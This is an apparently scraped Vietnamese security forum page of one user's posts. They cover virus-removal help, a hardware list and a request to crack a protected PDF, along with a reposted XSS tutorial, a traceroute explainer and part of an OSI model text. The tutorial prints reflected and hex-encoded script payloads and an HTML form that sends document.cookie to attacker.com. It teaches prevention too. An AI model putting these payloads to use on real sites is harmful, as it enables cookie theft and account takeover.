banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: romeowillkiss  XML
Profile for romeowillkiss Messages posted by romeowillkiss [ number of posts not being displayed on this page: 1 ]
 
cám ơn các bạn
vấn đề không phải là mình không biết xóa
mà vấn đề là có nên xóa file *.dll đi hay không? vì mình biết là do fil DLL gây ra nhưng ý mình hỏi là file DLL kia có còn dùng để làm gì nữa không biết đâu là file rì đó quan trọng trong win .
Nhưng sau khi mình xóa file dll máy chạy lại ngon rồi cám ơn các bạn
thì ra file dll chẳng có liên quan gì đến win hết bèn là file của virus phù may quá!
Cảm ơn các bạn nhé!
giup minh nhe smilie
Value name: BM63278a1b

Rundll32.exe "C:\WINDOWS\system32\nrvfktsu.dll",s

mình xóa mãi cho regedit mà ko được , xóa xong rồi nó lại hiện trong regedit

bây giờ mình nên xóa nrvfktsu.dll hay không ?
chán chưa. trời ơi là trời!

chọn giúp mình với
1 DDR 512MB bus 400 Avro, Dynet, Xtron, Starec, Elixir, Aeneon, Blitz... 34.0 34.0 Xóa
2 Intel Pentium 4 3.0 GHz (SK 478/ 1.0MB/ Bus 800) - Tray 76.0 76.0 Xóa
3 Mitsumi Scroll Mouse PS/2 - White 4.0 4.0 Xóa
4 HDD SamSung 80 GB PATA - Hàng chính hãng 48.0 48.0 Xóa
5 X9 Power Supply 480W 16.0 16.0 Xóa
6 SamSung DVD-RW 16-8-16 (ổ ghi DVD) 44.0 44.0 Xóa
7 BIOSTAR I945GZ-M7 (Intel 945GZ/Core 2 Duo/SK 775/VGA & Sound & NIC onboard/800 FSB) 68.0 68.0 Xóa
8 SamSung Keyboard PS/2 - PKB-700B/W 7.5 7.5 Xóa
9 X9 Pro (5002A, 5003A, 5007A) Case Full Size ATX 21.0 21.0 Xóa
10 Gigabyte 128MB GeForce FX-5200DE - AGP 8X 42.0 42.0 Xóa
Tổng tiền(USD) 360.5
Tỷ giá thanh toán 16 050VND/1USD
Tổng tiền phải thanh toán(VND) 5 786 025VND
 


ko có màn hình
em chọn đúng và đã được chưa ạ . em chỉ nhìn vào giá tiền mà chọn chứ ko biết rõ về phần cứng
nếu làm được thì hay quá , ai cũng tán thành thôi vì cái này sẽ giúp cho công đồng công nghê thông tin phát triển nhưng BQT HVA cũng cần phải có thời gian thu xếp .
cảm ơn mìnnh đã dùng thử những vẫm không được
những phần mềm crack này mình dã dùng thử hết rồi. hic
có một member của mình nhờ crack file PDF để có thể sử dụng chức nằng Select Text , Save As Copy, Save as text ,..






Đã sử dụng phần mềm Advanced PDF Password Recovery , PDF2WORD, Solidconverterpdf (để covert sang word, text) mà không thể được vậy mong các pro giúp đỡ , file PDF này "rắn" quá!
Xin cảm ơn và dưới đây là Link tập tin PDF
http://www.freewebtown.com/romeowillkiss/Thiet_ke_cot_tru_thep.pdf
Lưu ý để đọc được tập tin này phải download một số puglin cho Adobe Reader
bạn nào crack xong nho email cho mình nha: romeowillkiss@yahoo.com hoặc Pm
Xin cảm ơn!
trước hết khi bị nhiễm con này thì bạn ko thể post cho đúng box virus, trojan,...
khi máy bị dính bạn ko thể vào box nào có từ "Virus" hoặc "brontok.c[22]" "brontok" giả sử khi vào box virus tại HVA sẽ tự động tắt trình duyệt.

chưa hết bạn cũng rất khó để sử dụng các phần mềm diệt virus , các phầm mềm diệt virus nổi tiếng , hoặc là bị tắt ngay , hoặc là may mắn bạn sẽ sử dụng phần mềm diệt virus việt nam.

bạn cũng ko thể vào registry vì đã bị khoá
mặc dù bạn có thể chạy file *.vbs để mở lại
Code:
Option Explicit
Dim WSHShell, n, MyBox, p, Title911, errnum, vers, itemtype
Set WSHShell = WScript.CreateObject("WScript.Shell")
p = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\"
p = p & "DisableRegistryTools"
itemtype = "REG_DWORD"
Title911 = "Trung tam 911.com.vn"
Err.Clear
On Error Resume Next
n = WSHShell.RegRead (p)
On Error Goto 0
errnum = Err.Number
if errnum <> 0 then
WSHShell.RegWrite p, 0, itemtype
End If
If n = 0 Then
n = 1
WSHShell.RegWrite p, n, itemtype
Mybox = MsgBox("Registry cua ban da bi KHOA, logoff hoac khoi dong lai may tinh de thay doi co tac dung", 4096, Title911)
ElseIf n = 1 then
n = 0
WSHShell.RegWrite p, n, itemtype
Mybox = MsgBox("Registry cua ban da MO, logoff hoac khoi dong lai may tinh de thay doi co tac dung", 4096, Title911)
End If


Chưa hết bạn cũng ko thể dùng phần mềm Hjackthis để liệt kê các cách thức lây lan trong registry

ổ c:\ (ổ cài window) của bạn sẽ xuất hiện một tập tin TXT
Baca Bro !!!.txt (tôi cũng chưa dám chắc cóp phải là txt hay ko do tắt chế độ hiện file type)
Code:
BRONTOK.C[22]
Sedikit Jawaban u/ Membungkam Mulut Sesumbar 'MEREKA'.
Nobron = Satria Dungu = Nothing !!!
Romdil = Tukang Jiplak = Nothing !!!
Nobron & Romdil -->> Kicked by The Amazing Brontok
[ By JowoBot ]


bạn khó có thể vào google gõ từ khoá , đại loại có từ "virus", brontok.c[22]" "brontok" , bạn cũng ko thể vào explore và vào tool --> view --> để chỉnh lại show all file với bật chế độ hiện file type nói tóm lại bạn gặp khá nhiều phiền toái , còn một số phiền toái nữa xong tôi ko liệt kê như con này ko ưa trình duyệt opera (bạn hãy thử download opera bằng flash get mà xem)!

hic hic giúp tôi với ...............



_Batman_ wrote:
Cái file này mà nằm trong ổ đĩa hay một thư mục nào đó trong máy thì nó cũng có gây ra lỗi khi ta mở ổ đĩa hay thư mục đó.( ...khỏi mở file trong máy luôn...)
 


hị hị hị hị nhưng mở bằng Winrar thì ko bị
đã test tại win xp sp1

Vickizw wrote:

romeowillkiss wrote:
theo tôi victim chẳng bao giờ save file Url vào desktop làm gì mà vào một ổ , thư mục nào đó mà có save vào desktop thì cũng chẳng khó khăn gì khi đó cần gì phải vào DOS để xoá chỉ cần vào folder nào mà ko chứa file *.url mở một file *.rar (file nén) rồi chọn ổ đĩa thư mục có chứa file *.url click vào file *.url xoá là xong ! Winrar cũng hay thiệt smilie!
 


Lỡ không cài winrar thì sao smilie
mà đâu cần phải dùng đến winrar cho nó lâu
đây nè
Thêm một cách khác có thể xoá file url đó là
mở Windows Task Manager ra run IE sau đó vào đánh vào Desktop và xoá file là ok  
 



ừ đúng vậy ý kiến chính xác! nhưng mình nhận thấy rất nhiều máy sử dụng Winrar vì đây là 1 trong chương trình nén giải nén phổ biến và khá hay khá nhiều tiện ích !

theo tôi victim chẳng bao giờ save file Url vào desktop làm gì mà vào một ổ , thư mục nào đó mà có save vào desktop thì cũng chẳng khó khăn gì khi đó cần gì phải vào DOS để xoá chỉ cần vào folder nào mà ko chứa file *.url mở một file *.rar (file nén) rồi chọn ổ đĩa thư mục có chứa file *.url click vào file *.url xoá là xong ! Winrar cũng hay thiệt smilie!


Đăng nhập vàp admin cp > Skinning & Styles > Board Wrappers > Javascript
Thêm vào dưới chỗ : "<% Javascript %>"
<script src="http://www.quangcaoonline.org/viettyping.js" language="Javascript"></script>
DownLoad:
http://www.quangcaoonline.org/viettyping.js
bộ gõ HIM đó nhưng ngại đổi tên file js !
may quá vậy là post được rồi smilie

em xin thề là là lúc đó em post y chang thì nó hiện lỗi ko cho post các bài có các thẻ liên quan đến SQL injection và XSS

chắc cũng có một số mem khác post cũng gặp phải bằng chứng là cũng có bạn Vickizw cũng công nhận vậy mà

vậy thôi post được rồi

topic dừng lại dc rồi!
smilie
Nguồn từ: HVA Online
Tác giả: Luke

#
# Giới thiệu sơ lược về kĩ thuật tấn công CROSS-SITE SCRIPTING
# Vietnamese Version - Luke - HVA Copyrighted
# 07/27/03
#

Cross-Site Scripting (XSS) là một trong những kĩ thuật tấn công phổ biến nhất hiên nay, đồng thời nó cũng là một trong những vấn đề bảo mật quan trọng đối với các nhà phát triển web và cả những người sử dụng web. Bất kì một website nào cho phép người sử dụng đăng thông tin mà không có sự kiểm tra chặt chẽ các đoạn mã nguy hiểm thì đều có thể tiềm ẩn các lỗi XSS. Trong bài viết này tôi sẽ đề cập sơ lược tới XSS với một số kinh nghiệm của tôi qua kĩ thuật tấn công này.

1. XSS là gì ?
Cross-Site Scripting hay còn được gọi tắt là XSS (thay vì gọi tắt là CSS để tránh nhầm lẫn với CSS-Cascading Style Sheet của HTML) là một kĩ thuật tấn công bằng cách chèn vào các website động (ASP, PHP, CGI, JSP ...) những thẻ HTML hay những đoạn mã script nguy hiểm có thể gây nguy hại cho những người sử dụng khác. Trong đó, những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML.
Kĩ thuật tấn công XSS đã nhanh chóng trở thành một trong những lỗi phổ biến nhất của Web Applications và mối đe doạ của chúng đối với người sử dụng ngày càng lớn. Người chiến thắng trong cuộc thi eWeek OpenHack 2002 là người đã tìm ra 2 XSS mới. Phải chăng mối nguy hiểm từ XSS đã ngày càng được mọi người chú ý hơn.

2. XSS hoạt động như thế nào ?
Về cơ bản XSS cũng như SQL Injection hay Source Injection, nó cũng là các yêu cầu (request) được gửi từ các máy client tới server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server. Nó có thể là một request được gửi từ các form dữ liệu hoặc cũng có thể đó chỉ là các URL như là


Code:
http://www.example.com/search.cgi?query=<script>alert('XSS was found !');</script>




Và rất có thể trình duyệt của bạn sẽ hiện lên một thông báo "XSS was found !".
Các đoạn mã trong thẻ <script> không hề bị giới hạn bởi chúng hoàn toàn có thể thay thế bằng một file nguồn trên một server khác thông qua thuộc tính src của thẻ <script>. Cũng chính vì lẽ đó mà chúng ta chưa thể lường hết được độ nguy hiểm của các lỗi XSS.
Nhưng nếu như các kĩ thuật tấn công khác có thể làm thay đổi được dữ liệu nguồn của web server (mã nguồn, cấu trúc, cơ sở dữ liệu) thì XSS chỉ gây tổn hại đối với website ở phía client mà nạn nhân trực tiếp là những người khách duyệt site đó. Tất nhiên đôi khi các hacker cũng sử dụng kĩ thuật này đề deface các website nhưng đó vẫn chỉ tấn công vào bề mặt của website. Thật vậy, XSS là những Client-Side Script, những đoạn mã này sẽ chỉ chạy bởi trình duyệt phía client do đó XSS không làm ảnh hưởng đến hệ thống website nằm trên server.
Mục tiêu tấn công của XSS không ai khác chính là những người sử dụng khác của website, khi họ vô tình vào các trang có chứa các đoạn mã nguy hiểm do các hacker để lại họ có thể bị chuyển tới các website khác, đặt lại homepage, hay nặng hơn là mất mật khẩu, mất cookie thậm chí máy tính bạn có thể sẽ bị cài các loại virus, backdoor, worm ..

3. Cảnh giác với XSS
Có lẽ không cần liệt kê những nguy hiểm của XSS, nhưng trên thực tế nếu bạn có một chút hiểu biết về XSS bạn sẽ không còn phải sợ chúng nữa. Thật vậy bạn hoàn toàn có thể tránh khỏi việc bị tấn công bởi những lỗi XSS nếu hiểu kĩ về nó.
Các thẻ HTML đều có thể là công cụ cho các cuộc tấn công bởi kĩ thuật XSS, trong đó 2 thẻ IMG và IFRAME có thể cho phép trình duyệt của bạn load thêm các website khác khi các lệnh HTML được hiển thị. Ví dụ như BadTrans Worm một loại worm sử dụng thẻ IFRAME để lây lan trong các hệ thống có sử dụng Outlook hay Outlook Express:

Code:
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="filename.ext.ext"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
Đôi khi đang đọc thư bạn bị chuyển sang một website khác, bạn có nghĩ rằng bạn có thể mất mật khẩu. Trước đây, hàng loạt các hộp thư của Yahoo bị mất mật khẩu hay bị đọc trộm thư mà không rõ nguyên nhân. Có lẽ khi đó các bạn mở các bức thư mà không hề cảnh giác với XSS, đâu phải chỉ các file đính kèm mới có thể gây nguy hiểm cho bạn. Chỉ cần với một đoạn mã HTML gửi trong thư bạn đã hoàn toàn bị mất cookie của mình:
CODE
<form action="http://attacker.com/save.asp" method="post" name="XSS">
<input type="hidden" name="cookie">
</form>
<img border="0" onmouseover="window.document.XSS.cookie.value = document.cookie; window.document.XSS.submit();" src="none.jpg">


Vậy là khi bạn nhận thư, và nếu bạn vô tình đưa con chuột qua bức ảnh gửi kèm thì cũng có nghĩa là bạn đã bị lấy mất cookie. Và với cookie lấy được, các hacker có thể dễ dàng login hòm thư của bạn mà không cần biết mật khẩu của bạn. Thực sự tôi cũng rất bất ngờ khi tìm thấy rằng Yahoo khi đó đã ngăn được hầu hết các mối đe doạ từ các thẻ HTML lại bỏ qua thẻ IMG. Tuy nhiên cho tới ngày 12/7/2003 Yahoo đã kịp thời vá lỗ hồng nghiêm trọng này, nhưng không phải vì vậy mà bạn mất cảnh giác với những "lỗi" của website.
Nếu như bạn gặp một liên kết có dạng

http://example.com/search.cgi?query=<script>alert(document.cookie)</script> 



chắc chắn bạn sẽ phải xem xét kĩ trước khi click vào. Có thể là sẽ tắt JavaScript cho trình duyệt của bạn trước khi click vào hay ít nhất cũng có một chút cảnh giác. Nhưng nếu bạn gặp một liên kết như thế này thì sao :

Code:
http://example.com/search.cgi?%71%75%65%61%72%79%3D%3C%73%63%72%69%70%74%3E%61%6C%65%61%72%74%28%64%63%75%6D%65%6E%6C%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E]http://example.com/search.cgi?%71%75%65%61...%72%69%70%74%3E


Đó thực chất chính là liên kết ban đầu nhưng chỉ khác nó đã được mã hoá. Một phần kí tự của liên kết đã được thay thế bởi mã HEX của nó, tất nhiên trình duyệt của bạn vẫn hiểu địa chỉ đó thực sự là gì. Bởi vậy bạn có thể sẽ gặp phải các đoạn mã nguy hiểm nếu như bạn mất cảnh giác với XSS.
Tât nhiên còn rất nhiều những kiểu tấn công khác, trong đó có những kiểu đã được tìm ra có những kiều chưa lường hết được, những trong khuôn khổ bài viết này tôi hi vọng với một vài ví dụ vừa rồi, các bạn cũng đã hiểu phần nào về XSS.

4. Phát hiện XSS bằng cách nào ?
Nếu như các bạn sử dụng các mã nguồn của các chương trình có sẵn bạn có thể tham khảo danh sách các lỗ hổng của chương trình bạn trên các trang web chứa các thông tin về bảo mật như securityfocus.com, securiteam.com,... Tuy nhiên nếu các website được tự viết mã nguồn thì bạn không thể áp dụng phương pháp trên. Trong trường hợp này bạn cần đến các chương trình scanner tự động. Nếu như bạn sử dụng trong môi trường Windows bạn có thể dùng N-Stealth hay AppScan, đó là những chương trình scan khá tuyệt, bạn không chỉ kiểm tra được các lỗi XSS mà nó còn cho phép bạn kiểm tra các lỗi khác trong Website đó, Server đó.
Tất nhiên đâu phải lúc nào bạn cũng cần kiểm tra tất cả, nếu như bạn chỉ muốn kiểm tra các lỗi XSS có trong website, bạn chỉ cần sử dụng screamingCSS. Đó là một Perl Script sẽ mở các kết nối tới website (sử dụng Perl's socket) để kiểm tra các lỗi XSS của bạn. Hơn nữa bạn có thể sử dụng nó trong cả môi trường Unix lẫn Windows.

5. Ngăn ngừa XSS như thế nào ?
Người ta không lường hết được mức độ nguy hiểm của XSS nhưng cũng không quá khó khăn để ngăn ngừa XSS. Có rất nhiều cách để có thể giải quyết vấn đề này.
OWASP (The Open Web Application Standard Project) nói rằng để có thể xây dựng các website bảo mật cao, đối với các dữ liệu của người sử dụng bạn nên
+ Chỉ chấp nhận những dữ liệu hợp lệ.
+ Từ chối nhận các dữ liệu hỏng.
+ Liên tục kiểm tra và thanh lọc sữ liệu.
Tuy nhiên trên thực tế, một số trường hợp bạn phải chấp nhận mọi loại dữ liệu hay không có một bộ lọc phù hợp. Chính vì vậy bạn phải có những cách riêng để giải quyết.
Một trong những cách hay sử dụng là bạn mã hoá các kí tự đặc biệt trước khi in ra website, nhất là những gì có thể gây nguy hiểm cho người sử dụng. Trong trường hợp này thẻ <script> sẽ được đổi thành <script>. Như vậy nó sẽ vẫn được in ra màn hình mà không hề gây nguy hiểm cho người sử dụng.
Tôi lấy ví dụ với script search.cgi với mã nguồn là


Code:
#!/usr/bin/perl
use CGI;
my $cgi = CGI->new();
my $query = $cgi->param('query');
print $cgi->header();
print "You entered $query";


Đây hoàn toàn là một script có lỗi bởi vì nó in ra trực tiếp dữ liệu được nhập vào. Dĩ nhiên là khi in ra, nó sẽ in ra dưới dạng đoạn mã HTML, như thế nó không chỉ không in ra chính xác những dữ liệu vào một cách trực quan mà còn có tiềm ẩn lỗi XSS.
Như đã nói ở trên, để có thể giải quyết vấn đề này, chúng ta có thể mã hoá các kí tự đặc biệt của HTML với hàm HTML::Entities::encode(). Như vậy ta có thể có một mã nguồn hoàn hảo hơn như sau:


Code:
#!/usr/bin/perl
use CGI;
use HTML::Entities;
my $cgi = CGI->new();
my $text = $cgi->param('text');
print $cgi->header();
print "You entered ", HTML::Entities::encode($text);


Tất nhiên với phương pháp này bạn cũng có thể áp dụng đối với các ngôn ngữ Web Application khác (ASP, PHP...). Để kiểm tra việc lọc và mã hoá dữ liệu trước khi in ra, các bạn có thể dùng một chương trình được viết bằng ngôn nhữ PHP, đặc biệt nó được thiết kế để phòng chống các lỗi XSS. Bạn có thể lấy mã nguồn chương trình từ http://www.mricon.com/html/phpfilter.html
Lọc và mã hoá các dữ liệu cho vấn là cách tốt nhất để chống XSS nhưng nếu bạn đang sử dụng mod_perl trên Apache Server thì bạn có thể dùng ngay module Apache::TaintRequest. Khi đó mã nguồn chương trình sẽ có dạng :


Code:
use Apache::TaintRequest;
my $apr = Apache::TaintRequest->new(Apache->request);
my $text = $apr->param('text');
$r->content_type("text/html");
$r->send_http_header;
$text =~ s/[^A-Za-z0-9 ]//;
$r->print("You entered ", $text);



Kĩ thuật XSS được mô tả lần đầu tiên cách đây 2 năm và hầu hết các khả năng tiềm ẩn của kĩ thuật này đã được biết đến. Tuy nhiên chúng ta mới chỉ khắc phục được một phần của nó. Không phải vô tình mà Yahoo Mail lại để sót một lỗi XSS trong bộ lọc của mình. Một phương pháp tối ưu vẫn còn đang ở phía trước.
http://quangcaoonline.org/BanLuan/index.php?showtopic=823

---------------Trích 1 đoạn---------------

#
# Giới thiệu sơ lược về kĩ thuật tấn công CROSS-SITE SCRIPTING
# Vietnamese Version - Luke - HVA Copyrighted
# 07/27/03
#

Cross-Site Scripting (XSS) là một trong những kĩ thuật tấn công phổ biến nhất hiên nay, đồng thời nó cũng là một trong những vấn đề bảo mật quan trọng đối với các nhà phát triển web và cả những người sử dụng web. Bất kì một website nào cho phép người sử dụng đăng thông tin mà không có sự kiểm tra chặt chẽ các đoạn mã nguy hiểm thì đều có thể tiềm ẩn các lỗi XSS. Trong bài viết này tôi sẽ đề cập sơ lược tới XSS với một số kinh nghiệm của tôi qua kĩ thuật tấn công này.

1. XSS là gì ?
Cross-Site Scripting hay còn được gọi tắt là XSS (thay vì gọi tắt là CSS để tránh nhầm lẫn với CSS-Cascading Style Sheet của HTML) là một kĩ thuật tấn công bằng cách chèn vào các website động (ASP, PHP, CGI, JSP ...) những thẻ HTML hay những đoạn mã script nguy hiểm có thể gây nguy hại cho những người sử dụng khác. Trong đó, những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML.
Kĩ thuật tấn công XSS đã nhanh chóng trở thành một trong những lỗi phổ biến nhất của Web Applications và mối đe doạ của chúng đối với người sử dụng ngày càng lớn. Người chiến thắng trong cuộc thi eWeek OpenHack 2002 là người đã tìm ra 2 XSS mới. Phải chăng mối nguy hiểm từ XSS đã ngày càng được mọi người chú ý hơn.

2. XSS hoạt động như thế nào ?
Về cơ bản XSS cũng như SQL Injection hay Source Injection, nó cũng là các yêu cầu (request) được gửi từ các máy client tới server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server. Nó có thể là một request được gửi từ các form dữ liệu hoặc cũng có thể đó chỉ là các URL như là :

-------------------------------------------



hu hu hu hu em thử rồi ko post được toàn nhận được thông báo bị chặn lại
giả sử em muốn post lại bài của anh Luke về XSS chẳng hạn thì ko thể post được! mặc dù bài post của Luke rất hay và em cũng chẳng có ý xấu rì!

xin lỗi các bạn vì đã cung cấp nhầm thông tin bản thân mình cũng nghĩ bị nhầm. cũng xin cám ơn các bạn vì đã trả lời
vì tiện Net là của 1 người bạn nó kể thế nào thì mình ghi lại như thế thôi
hôm nay mình tới tận nơi để xem thì thấy hoá ra là ko phải share từ máy chủ mà mỗi máy có 1 ổ cứng . và boot từ HDD như bình thường nhưng do ổ cứng bị hư nên mới báo lỗi vậy! cảm ơn các bạn nhé
tôi dùng thử tool này thì nó đúng là tiện với các bạn mới, nó quyét những lỗi nằm trong database, nó quyét sơ qua về server, quyét thư mục .., nếu bạn đã biết một chút về XSS, SQL injection thì thấy cơ chế test 2 lỗi này không tốt, mà 2 lỗi này lại là điểm mạnh của tool này
http://quangcaoonline.org/BanLuan/index.php?showtopic=9
Boot HDD

thứ tự trong bios là
First: CD_ROM
second: A:
Third: C:\
Forth: MẠng (gì gì dài lằng ngoằng bằng tiếng Anh)

hu hu hu
em kiểm tra kỹ rồi
tiệm Net đang hoạt động bình thường ko có gì xảy ra
bỗng nhiên hôm nay có một máy tính khi bật lên chỉ thấy
non-system disk or disk error
replace and strike and key when ready

báo là không có đĩa hệ thống hoặc đĩa lỗi
ổ cứng thì share từ 1 máy chủ
hu hu bây giờ em phải làm sao đây?

muốn chặn keylog hiệu quả cài notor an ti virus cập nhật thường xuyên và theo dỏi trong registry , các thư mục hệ thống, khởi động ..., xem có xuất hiện những file lạ ko có thể dùng tool Hjackthis nếu bạn gặp khó khăn về vấn đề này!
có thể dùng thêm biện pháp gõ mật khẩu bằng chuột
tuy nhiên cũng có keylog qua mặt được do khi bạn copy nó view được Clipboard!
bó tay với cái bug này làm gì có ai mà quên việc đổi tên, hoặc xoá thư mục install đi
thường thì sau khi cài đặt các thư mục cài đặt , cập nhật, các tập tin cài đặt , cập nhật đều được quản lý rất chặt chẽ ngoài việc đổi tên thì họ ngăn cản quyền truy cập vào các thư mục tập tin này
or để cho chắc cú họ càng có thể xoá hẳn những thư mục này đi , khi nào cần họ có thể upload lại !



Tôi đoán khi bạn vào một thư mục ví dụ thư mục có tên là : Romeowillkiss thì ngay trong thư mục này bạn sẽ thấy có một tập tin exe có tên là romeowillkiss.exe và biểu tượng giống ko khác gì biểu tượng của thư mục !

Cách diệt
nếu bạn vẫn muốn dùng các chương trình diệt Việt Nam thì có thể dùng
Dùng D32 để diệt :
bước 1: đầu tiên down load bản full
D32 Full
rồi cài đặt
bước 2: download bản cập nhật ngày 30/4/06
download tại echip.com.vn

Tắt chế độ System Restore của hệ thống bởi vì chương trình diệt virus không quét được thông tin trên phần Restore của Windows.
Bấm vào nút Start.
Bấm phải chuột vào My Computer, chọn Properties.
Tại System Restore tab, bấm Turn off System Restore hoặc Turn off System Restore on all drives

sau khi download full và cập nhật thì quyét computer là xong


diệt bằng tay để biết cách thức lây lan và giệt thì vào 911.com.vn hoặc vào google.com trong mục tìm kiếm gõ
W32.Rontokbro.B@mm (ko lẽ mọi người phải post nguyên si nó lên đây, bạn đừng lười nhé)



Cách này giờ ko còn dùng được nữa
còn đòi hỏi victim có bật ActiveX ko nữa chứ , nếu victim ko bấm ok thì sao?
Notor Anti - Virus liệu có cho chạy ko?
sử dụng Trình duyệt Khác IE thì sao?

Cách làm việc của traceroute!

Traceroute gởi một IP datagram có TTL=1 đến hệ thống đích. Router đầu tiên nhận được datagram này sẽ giảm giá trị TTL đi một -> TTL=0 và router này sẽ bỏ qua datagram này(không gởi nó đi tiếp!) và gởi một ICMP error message với địa chỉ ip nguồn là địa chỉ của nó đến máy bạn. Như vậy router có thể xác định địa chỉ ip của router thứ nhất! Sau đó, traceroute sẽ gởi một datagram mới đi với giá trị TTL=2(1+1=2) đến hệ thống đích. Router đầu tiên sẽ giảm giá trị của TTL đi một -> TTL=1(2-1=1) và chuyển datagram này sang router thứ 2. Router thứ 2 nhận được datagram có TTL=1 sẽ giảm TTL=0. Rounter 2 nhận thấy TTL=0 nên nó sẽ không chuyển datagram này đi tiếp. Router 2 sẽ gởi trở lại máy bạn một ICMP error message với địa chỉ ip nguồn là địa chỉ ip của nó(router 2). Như vậy trình traceroute trên máy bạn sẽ biết được router thứ 2 mà datagram đã đi qua. Traceroute sẽ tiếp tục gởi một datagram khác có TTL=3(2+1=3) đi và lặp lại quá trình trên cho đến khi datagram đến được hệ thống đích!

Nếu bây giờ IP datagram đã đến được đích, TTL=1. Host đích sẽ bỏ qua datagram này và nó cũng sẽ không gởi "Time Exceeded" ICMP error message. Như vậy thì bạn sẽ không thể nào biết được là mình đã đến đích chưa?! Traceroute dùng một cơ chế khác như sau:

Traceroute gởi UDP datagrams đến host đích trên các cổng UDP có số hiệu lớn(>30000). Sở dĩ nó chọn các cổng có giá trị lớn vì thường không có ứng dụng nào đang lắng nghe ở các cổng này. Khi host đích nhận được UDP datagram này, nó sẽ gởi trả lại một ICMP error message "Port Unreachable"(không đến được cổng) cho traceroute. Bây giờ thì traceroute có thể phân biệt được sự khác nhau giữa ICMP error message "Time Exceeded" với "Port Unreachable" để biết được đã đến được đích hay chưa?!

Ghi chú: ICMP error message "Time Exceeded" có type=1 và code=0; ICMP eror message "Port Unreachable" có type=3 và code=3

Tổng kết: traceroute gởi UDP datagrams đến host đích với giá trị TTL=1 và được tăng sau mỗi lần để xác định các routers mà datagrams đã đi qua. Mỗi router sẽ gởi trở về một ICMP message "Time Exceeded". Riêng hệ thống đích sẽ gởi trở lại cho traceroute một ICMP message "Port Unreachable". Traceroute dựa vào sự khác biệt này để xác định xem đã đến được đích chưa?!

Ví dụ cuối cùng!

host2 # traceroute xyz.com

traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms

Dòng đầu tiên cho biết hostname và địa chỉ IP của hệ thống đích. Dòng này còn cho chúng ta biết thêm giá trị TTL<=30 và kích thước của datagram là 40 bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes user data).

Dòng thứ 2 cho biết router đầu tiên nhận được datagram là 202.xy.34.12, giá trị của TTL khi gởi đến router này là 1. Router này sẽ gởi trở lại cho chương trình traceroute một ICMP message error "Time Exceeded". Traceroute sẽ gởi tiếp một datagram đến hệ thống đích.

Dòng thứ 3, xyz.com(202.xx.12.34) nhận được datagram có TTL=1(router thứ nhất đã giảm một trước đó - TTL=2-1=1). Tuy nhiên, xyz.com không phải là một router, nó sẽ gởi trở lại cho traceroute một ICMP error message "Port Unreachable". Khi nhận được ICMP message này, traceroute sẽ biết được đã đến được hệ thống đích xyz.com và kết thúc nhiệm vụ tại đây.

Trong trường hợp router không trả lời sau 5 giây, traceroute sẽ in ra một dấu sao "*"(không biết) và tiếp tục gởi datagram khác đến host đích!

Hy vọng đến đây bạn có hiểu được traceroute làm việc như thế nào!? smile.gif Không có thời gian format font lại cho rõ ràng hơn ! Dù sao cũng hy vọng các bạn hiểu được bài viết này !
Happy hacking !
Thân !
__________________

Vì đây là Topic "Basic Hacking" nên mình trích dẫn thêm bài viết của anh chube_hamhoc - một cựu thành viên của VNISS . Không dùng code quote vì code này dỏm quá


Để mạng đạt khả năng tối đa, các tiêu chuẩn được chọn phải cho phép mở rộng mạng để có thể phục vụ những ứng dụng không dự kiến trước trong tương lai tại lúc lắp đặt hệ thống và điều đó cũng cho phép mạng làm việc với những thiết bị được sản xuất từ nhiều hãng khác nhau.

Hội đồng tiêu chuẩn quốc tế là ISO (International Standards Organization), do các nước thành viên lập nên. Công việc ở Bắc Mỹ chịu sự điều hành của ANSI (American National Standards Institude) ở Hoa Kỳ. ANSI đã uỷ thác cho IEEE (Institude of Electrical and Electronics Engineers) phát triển và đề ra những tiêu chuẩn kỹ thuật cho LAN.

ISO đã đưa ra mô hình 7 mức (layers, còn gọi là lớp hay tầng) cho mạng, gọi là kiểu hệ thống kết nối mở hoặc mô hình OSI (Open System Interconnection).

Chức năng của mức thấp bao gồm cả việc chuẩn bị cho mức cao hơn hoàn thành chức năng của mình. Một mạng hoàn chỉnh hoạt động với mọi chức năng của mình phải đảm bảo có 7 mức cấu trúc từ thấp đến cao.

Mức 1: Mức vật lý (Physical layer)
Thực chất của mức này là thực hiện nối liền các phần tử của mạng thành một hệ thống bằng các phương pháp vật lý, ở mức này sẽ có các thủ tục đảm bảo cho các yêu cầu về chuyển mạch hoạt động nhằm tạo ra các đường truyền thực cho các chuỗi bit thông tin.

Mức 2: Mức móc nối dữ liệu (Data Link Layer)
Nhiệm vụ của mức này là tiến hành chuyển đổi thông tin dưới dạng chuỗi các bit ở mức mạng thành từng đoạn thông tin gọi là frame. Sau đó đảm bảo truyền liên tiếp các frame tới mức vật lý, đồng thời xử lý các thông báo từ trạm thu gửi trả lại.
Nói tóm lại, nhiệm vụ chính của mức 2 này là khởi tạo và tổ chức các frame cũng như xử lý các thông tin liên quan tới nó.

Mức 3: Mức mạng (Network Layer)
